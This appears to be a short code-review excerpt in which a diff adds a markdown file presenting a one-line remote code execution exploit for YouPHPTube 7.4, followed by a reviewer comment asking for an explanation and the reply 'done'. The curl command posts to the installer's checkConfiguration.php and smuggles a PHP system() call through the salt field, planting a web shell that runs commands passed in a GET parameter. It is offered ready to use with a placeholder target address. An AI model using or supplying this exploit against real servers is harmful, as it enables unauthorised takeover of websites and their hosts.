categories/avideo-exploit.md

```diff
@@ -0,0 +1,10 @@
+## YouPHPTube 7.4  Remote Code Execution 
+
+```sh
+curl -s "http://put-ip-here/install/checkConfiguration.php" --data "contactEmail=fake-email@fake.com&createTables=2&mainLanguage=RCE&salt=';system(\$_GET['bots']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=/var/www/html/&webSiteRootURL=/var/www/html/&webSiteTitle=Site-Title-Here&databaseHost=127.0.0.1&databaseName=Any-DBname-Here&databasePass=&databasePort=3306&databaseUser=root" 
+```
```

Comment:
explain what this does so that the next line with the example makes sense.

Reply:
done